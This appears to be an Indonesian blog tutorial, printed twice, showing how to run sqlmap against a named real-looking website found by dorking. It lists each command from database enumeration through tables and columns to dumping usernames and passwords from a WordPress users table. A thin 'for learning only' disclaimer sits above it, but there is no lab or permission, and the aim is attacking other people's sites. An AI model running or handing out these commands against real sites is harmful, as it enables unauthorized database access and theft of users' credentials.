tutorial ini hanya sebagai pembelajaran semata, semua isi dalam tutorial ini diluar tanggung jawab penulis.
tutorial tidak diperuntukkan sebagai aksi kriminal yang melanggar hukum agama,etika dan moral.
USE WITH YOUR OWN RISK!!!!
yup kita mulai:
disini saya asumsikan anda telah menginstall sqlmap dan telah mendapat target sqli vulnerable, bisa dari hasil dorking atau scanning
misal disini kita mendapat celah sql injection di id:http://www.supersexyblogs.com/links/view.php?feed=55
lalu buka terminal dan buka sqlmap lalu ketik:
sqlmap.py -u http://www.supersexyblogs.com/links/view.php?feed=55 --dbs
jika keluar opsi pilih aja opsi "C" atau Continue (tanpa tanda kurung)
nah perintah --dbs adalah perintah untuk mencari table database.
kemudian anggap aja kita telah mendapat table database sebagai berikut, misal:
1.web_01
2.usr_web_4_1
3.admin
disini kita melihat ada 3 table database. nah jika kemudian anda ingin memasuki isi salah satu table, maka..
sebagai contoh saya asumsikan disini kita akan memasuki table usr_web_4_1 maka menjadi:
sqlmap -u http://www.supersexyblogs.com/links/view.php?feed=55 -D usr_web4_1 --tables
dari hasil memasuki table tsb misalnya kita mendapat 2 columns, misal:
1.wp_users
2.wp_index
trus kemudian jika anda ingin memasuki column wp_users maka perintah menjadi:
sqlmap -u http://www.supersexyblogs.com/links/view.php?feed=55 -D usr_web4_1 -T wp_users --columns
trus kita asumsikan kita mendapat hasil column sebagai berikut:
1.id
2.username
3.password
lantas jika kita ingin mengetahui data colom tersebut maka menjadi:
sqlmap.py -u http://www.supersexyblogs.com/links/view.php?feed=55 -D usr_web4_1 -T wp_users -C id,username,password --dump
maka akan tampil data id,username dan passwordnya.
selesai.
by RDK03 2013
for street cyber only
disini saya asumsikan anda telah menginstall sqlmap dan telah mendapat target sqli vulnerable, bisa dari hasil dorking atau scanning
misal disini kita mendapat celah sql injection di id:http://www.supersexyblogs.com/links/view.php?feed=55
lalu buka terminal dan buka sqlmap lalu ketik:
sqlmap.py -u http://www.supersexyblogs.com/links/view.php?feed=55 --dbs
jika keluar opsi pilih aja opsi "C" atau Continue (tanpa tanda kurung)
nah perintah --dbs adalah perintah untuk mencari table database.
kemudian anggap aja kita telah mendapat table database sebagai berikut, misal:
1.web_01
2.usr_web_4_1
3.admin
disini kita melihat ada 3 table database. nah jika kemudian anda ingin memasuki isi salah satu table, maka..
sebagai contoh saya asumsikan disini kita akan memasuki table usr_web_4_1 maka menjadi:
sqlmap -u http://www.supersexyblogs.com/links/view.php?feed=55 -D usr_web4_1 --tables
dari hasil memasuki table tsb misalnya kita mendapat 2 columns, misal:
1.wp_users
2.wp_index
trus kemudian jika anda ingin memasuki column wp_users maka perintah menjadi:
sqlmap -u http://www.supersexyblogs.com/links/view.php?feed=55 -D usr_web4_1 -T wp_users --columns
trus kita asumsikan kita mendapat hasil column sebagai berikut:
1.id
2.username
3.password
lantas jika kita ingin mengetahui data colom tersebut maka menjadi:
sqlmap.py -u http://www.supersexyblogs.com/links/view.php?feed=55 -D usr_web4_1 -T wp_users -C id,username,password --dump
maka akan tampil data id,username dan passwordnya.
selesai.
by RDK03 2013
for street cyber only
0 Comments Received
Leave A Reply